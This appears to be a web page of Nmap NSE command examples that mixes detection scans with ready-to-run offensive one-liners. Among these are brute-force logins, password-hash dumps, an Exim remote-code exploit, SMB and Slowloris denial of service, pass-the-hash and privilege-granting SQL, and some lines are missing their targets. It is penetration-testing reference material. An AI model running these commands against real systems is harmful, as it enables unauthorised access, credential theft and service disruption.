legal contact

using NSE scripts

The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write and share scripts to automate a wide variety of networking tasks.

Those scripts are written in the embedded Lua programming language and they are executed in parallel.

Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.

You can find here the official Nmap NSE Scripts and LUA Libraries Portal, where you can browse and download the scripts by categories or by alphabetically name.

You can find below many useful examples of running Nmap scans by using NSE scripts.

Sniffer Detection on the Specified File Containing a List of IP Addresses:

nmap-script sniffer-detect -iL IPList.txt -osniffer-detect.txt

Perform a Firewalking (Discover Firewall Rules using an IP TTL Expiration Technique):

nmap --script=firewalk --traceroute <host>

nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>

nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>

nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Detects a Vulnerability in Netfilter and other Firewalls that use Helpers to dynamically Open Ports for Protocols, such as FTP and SIP:

nmap --script firewall-bypass <target>

nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 <target>

Perform a DNS Fuzzing Attack against DNS Server:

nmap --script dns-fuzz --script-args timelimit=2h

Perform a Form Fuzzing against Forms on WebSites:

nmap --script http-form-fuzzer -p 80

Crawls a Web Server and Sends an Attack Vector/Probe to Find PHP Files Vulnerable to Reflected Cross Site Scripting via the variable $_SERVER["PHP_SELF"],

PHP_SELF XSS Refers to Vulnerabilities caused by the Lack of Sanitation of the variable $_SERVER["PHP_SELF"] commonly used in PHP Scripts that display forms:

The Vector/Probe Attack used is /'"/><script>alert(1)</script>

nmap --script=http-phpself-xss -p80 <target>

nmap -sV --script http-self-xss <target>

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369):

nmap -sV --script realvnc-auth-bypass.nse

nmap -sV -sC --script realvnc-auth-bypass

Oracle 11g Users Scan (bug fixed in Oracle's October 2009 Critical Patch Update):

nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560

Dumps the Password Hashes from an MySQL Server in a Format Suitable for Cracking by Tools such as John-the-ripper:

nmap -p 3306 --script mysql-dump-hashes --script-args='username=root,password=secret'

MySQL Server Users Scan:

nmap -sV --script mysql-users

Brute Force Passwords MySQL:

nmap --script=mysql-brute

Run a Query against a MySQL Database and Returns the Results as a Table:

nmap -p 3306 --script mysql-query --script-args='query="SELECT * FROM table_name WHERE (userID LIKE '%ELM%');"[,username=root,password=secret]'

nmap -p 3306 --script mysql-query --script-args='query="GRANT ALL PRIVILEGES ON db_base.* TO db_user @'%' IDENTIFIED BY 'db_passwd';"[,username=root,password=secret]'

nmap -p 3306 --script mysql-query --script-args='query="INSERT INTO table_name (status, permissions) VALUES ('OK','ALL') WHERE (userID LIKE '%ELM%');"[,username=root,password=secret]'

Dumps the Password Hashes from an Microsoft SQL Server (ms-sql) in a Format Suitable for Cracking by Tools such as John-the-ripper:

nmap -p 1433 --script ms-sql-dump-hashes

Attempts to Authenticate to Microsoft SQL Servers using an Empty Password for the Sysadmin (sa) Account:

nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all

nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-name=PRDB,mssql.instance-port=1432

nmap -p 1433 --script ms-sql-empty-password

Queries Microsoft SQL Server (ms-sql) Instances for a List of Databases a User has Access to:

nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa

nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-all

nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa,mssql.instance-name=PRDB,mssql.instance-port=1432

Retrieves the Authentication Scheme and Realm of a Web Service that Requires Authentication:

nmap --script http-auth [--script-args http-auth.path=/login] -p80

Scan for Access with Default Credentials used by a variety of Web Applications and Devices:

nmap -p80 --script http-default-accounts

Scan for a JBoss Server is Vulnerable to JMX Console Authentication Bypass (CVE-2010-0738):

nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}'

Discovers Valid Usernames by Brute-Force Querying Likely Usernames against a Kerberos Service:

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Checks Target IP Addresses against Multiple DNS Anti-Spam and Open Proxy Blacklists and Returns a List of Services for which an IP has been Flagged.

Checks may be Limited by Service Category (eg: SPAM, PROXY) or to a Specific Service Name.

nmap --script dns-blacklist --script-args='dns-blacklist.ip='

nmap -sn --script dns-blacklist

Detects whether the Remote Device has IP Forwarding or "Internet Connection Sharing" Enabled, by Sending an ICMP Echo Request to a Given Target using the Scanned Host as Default Gateway:

nmap -sn --script ip-forwarding --script-args=''

Extracts a List of Citrix Servers from the ICA Browser Service:

nmap -sU --script=citrix-enum-servers -p 1604

Extracts a List of Applications, ACLs, and Settings from the Citrix XML Service:

nmap --script=citrix-enum-apps-xml -p 80,443,8080

Check if ePO Agent is Running on Port 8081 or Port Identified as ePO Agent Port:

nmap -sV --script=mcafee-epo-agent

Check Presence of ms12-020 RDP vulnerability:

nmap –sC –p 3389 –vv –script-trace –script ms12-020-rev.nse

Attempts to Perform an LDAP Search and Returns All Matches:

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,


nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,

ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows *Server*",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}'

Retrieves the LDAP Root DSA-Specific Entry (DSE):

nmap -p 389 --script ldap-rootdse

Lists Remote File Systems by Querying the Remote Device using the Network Data Management Protocol (ndmp).

NDMP is a Protocol Intended to Transport Data Between a NAS Device and the Backup Device, Removing the Need for the Data to Pass through the Backup Server.

nmap -p 10000 --script ndmp-fs-info

Retrieves Configuration Information from a Lexmark S300-S400:

nmap -sV --script=lexmark-config

Lotus Domino Users Scan:

nmap --script domino-enum-users -p 1352

Scan for an identd (auth) Server which is Spoofing its Replies:

nmap -sV --script=auth-spoof

Looks for Signature of Known Server Compromises

nmap -sV --script=http-malware-host

Checks if Hosts are on Google's Blacklist of Suspected Malware and Phishing Servers.

The script queries the Google's Safe Browsing service and you need to have your own API key to access Google's Safe Browsing Lookup services.

Sign up for yours at

nmap -p80 --script http-google-malware

Scan for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523):

nmap --script ftp-vsftpd-backdoor -p 21

Scan for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562:

nmap --script ftp-proftpd-backdoor -p 21

Brute Force Password Scan against the WinPcap Remote Capture Daemon (rpcap):

nmap -p 2002 --script rpcap-brute

Brute Force Password Scan against rsync:

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www'

Brute Force Password Scan against the VMWare Authentication Daemon (vmware-authd):

nmap -p 902 --script vmauthd-brute

Brute Force Password Scan against VNC Servers:

nmap --script vnc-brute -p 5900

Brute Force Password Scan against SMTP using LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM:

nmap -p 25 --script smtp-brute

Brute Force Password Scan against rlogin service:

nmap -p 513 --script rlogin-brute

Brute Force Password Scan against POP3 Servers using either "USER" (default), "SASL-PLAIN", "SASL-LOGIN", "SASL-CRAM-MD5", or "APOP":

nmap -sV --script=pop3-brute

Brute Force Password Scan against IMAP Servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM Authentication:

nmap -p 143,993 --script imap-brute

Scan for and/or Exploits a Heap Overflow within Versions of Exim prior to 4.69 (CVE-2010-4344) and a Privilege Escalation Vulnerability in Exim 4.72 and below (CVE-2010-4345).

The heap overflow vulnerability allows remote attackers to execute arbitrary code with the privileges of the Exim daemon (CVE-2010-4344). If the exploit fails then the Exim smtpd child will be killed (heap corruption).

The privilege escalation vulnerability allows the exim user to gain root privileges by specifying an alternate configuration file using the -C option (CVE-2010-4345).

nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587

nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587

Detects PHP-CGI Installations Vulnerable to CVE-2012-1823, a Critical Vulnerability that Allows Attackers to Retrieve Source Code and Execute Code Remotely.

The script works by appending "?-s" to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern "<span style=.*>&lt;?" to detect vulnerable installations.

nmap -sV --script http-vuln-cve2012-1823

nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php

Scan a Web Server for Slowloris DoS attack Vulnerability:

nmap --script http-slowloris --max-parallelism 400

Exhausts a Remote SMB Server's Connection Limit by Opening as Many Connections as we can.

Most implementations of SMB have a Hard Global Limit of 11 Connections for User Accounts and 10 Connections for anonymous.

Once that Limit is rReached, further Connections are Denied. This Script Exploits that Limit by taking up All the Connections and Holding them.

This works better with a valid user account, because Windows reserves one slot for valid users.

nmap --script smb-flood.nse -p445

nmap -sU -sS --script smb-flood.nse -p U:137,T:139

Detects Huawei Modems Models HG530x, HG520x, HG510x (and others...) Vulnerable to a Remote Credential and Information Disclosure Vulnerability. It also Extracts the PPPoE Credentials and Other interesting Configuration Values.

nmap -p80 --script http-huawei-hg5xx-vuln <target>

nmap -sV http-huawei-hg5xx-vuln <target>

Scan to Discover Hosts in the Local Network using the DNS Service Discovery protocol and Sends a NULL UDP Packet to Each Host to Test if it's Vulnerable to the Avahi NULL UDP Packet Denial Of Service (CVE-2011-1002):

nmap --script=broadcast-avahi-dos

Exploits the CVE-2012-3137 Vulnerability, a Weakness in Oracle's O5LOGIN Authentication Scheme:

nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL

Guesses Oracle Instance/SID Names against the TNS-Listener:

nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560

nmap --script=oracle-sid-brute -p 1521-1560

Brute Force Password Scan against Nessus Vulnerability Scanning Daemon using the NTP 1.2 Protocol:

nmap --script nessus-brute -p 1241

acarsd Scan on the Specified Port and Host/Network:

nmap --script acarsd-info --script-args "acarsd-info.timeout=10,acarsd-info.bytes=512" -p <port>

Brute Force Password Scan against FTP Server:

nmap --script ftp-brute -p 21

Scan an FTP Server for Anonymous Login:

nmap -sV --script ftp-anon

Spiders a Web Site and Collects eMail Addresses:

nmap --script=http-email-harvest

Checks for a Path-Traversal Vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733):

nmap --script http-vmware-path-vuln -p80,443,8222,8333

Retrieves Information from an Apache Hadoop Secondary NameNode HTTP Status Page:

nmap --script hadoop-secondary-namenode-info -p 50090

Retrieves Information from an Apache Hadoop NameNode HTTP Status Page:

nmap --script hadoop-namenode-info -p 50070

Discovers Hostnames that Resolve to the Target's IP Address by Querying the Robtex Service at

nmap --script hostmap-robtex

Retrieves the Locations of All "Find my iPhone" Enabled iOS Devices by Querying the MobileMe Web Service:

nmap -sn -Pn --script http-icloud-findmyiphone --script-args='username=<user>,password=<pass>'

Brute Force Password Scan against HTTP Server (Basic Authentication - Default Method GET):

nmap --script http-brute -p 80

Brute Force Password Scan against HTTP Server (Form-Based Authentication):

nmap --script http-form-brute -p 80

Brute Force Password Auditing against Joomla Web CMS Installations:

nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=passwds.txt,,http-joomla-brute.threads=3,brute.firstonly=true'

nmap -sV --script http-joomla-brute

Brute Force Password Scan against HTTP Proxy Server:

nmap --script http-proxy-brute -p 8080

Brute Force Password Auditing against the BackOrifice Service:

nmap -sU --script backorifice-brute --script-args backorifice-brute.ports="U:31337,25252,151-222", "U:1024-1512"

Brute Force LDAP Authentication:

nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <host>

Brute Force Password against iSCSI Target:

nmap -sV --script=iscsi-brute

Brute Force Password against Wordpress CMS/Blog Server:

nmap -sV --script http-wordpress-brute

nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,,http-wordpress-brute.threads=3,brute.firstonly=true'

Attempts to Guess Valid Credentials for the Citrix PN Web Agent XML Service:

nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443,8080

Detect Zeus Botnet (by querying in the Specified Network (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):

nmap -v -sn -PN --script=dns-zeustracker


dig +short A

dig +short TXT

dig +short A

dig +short TXT

# The Response means that the Domain is Listed on the ZT.

# To Check the IP address

dig +short TXT

# To Check the Domain

dig +short A

dig +short TXT

Perform a DNS Update (without Authentication):

nmap -sV --script=dns-update

Performs Password Guessing Against Apple Filing Protocol (AFP):

nmap -p 548 --script afp-brute

Shows AFP shares and ACLs:

nmap -sV --script=afp-showmount

Listens for the LAN Sync Information Broadcasts that the Client Broadcasts Every 20 seconds, then Prints All the Discovered Client IP Addresses, Port Numbers, Version Numbers, Display Names, and more:

nmap -sV --script=broadcast-dropbox-listener

Discovers EMC Networker Backup Software Servers on a LAN by Sending a Network Broadcast Query:

nmap --script broadcast-networker-discover

Scan to Check Windows Security Mode(s) Supported (for example, if Message signing is not supported, then Man-In-The-Middle Attacks are possible):

nmap -p445 --script=smb-security-mode

Windows OS Discovery Scan:

nmap -p445 -script=smb-os-discovery

Windows Shares Enumeration Scan (Without Specifying Credentials and by Specifying a User and a Password or a Hash):

nmap -p445 --script=smb-enum-shares

by Specifying a User and a Password:

nmap -v -p445 --script=smb-enum-shares --scriptargs=smbuser=administrator,smbpass=blink182

by Specifying a User and a Hash with the "Passwing the Hash" technique (the Hash can be Obtained by Using fgdump or pwdump6, decrypted from the SAM file, dumped with the "smb-pwdump.nse" script):

nmap -p445 --script=smb-enum-shares --scriptargs=smbuser=administrator,smbhash=cd401a40ae92face50b8e4fe1911060e

Password Hashes dumped this way from one server can be directly used to access other servers, without cracking them. The hash can be used directly by passing a "smbhash" argument instead of "smbpass":

Brute-Force Windows Account Passwords:

nmap -p445 --script=smb-brute.nse,smb-enum-shares

Attempt a Brute Login through SMB Windows Account:

nmap -p445 --script=smb-brute

Windows Users Enumeration (using both SAMR and LSA):

nmap -v -p445 --script=smb-enum-users

nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139

Windows Sessions Enumeration:

nmap -vv -p445 --script=smb-enum-sessions

Windows Processes Enumeration:

nmap -vv -p445 --script=smb-enum-processes --scriptargs=smbuser=test,smbpass=test

Windows System Info:

nmap -p445 --script=smb-system-info --script-args=smbuser=test,smbpass=test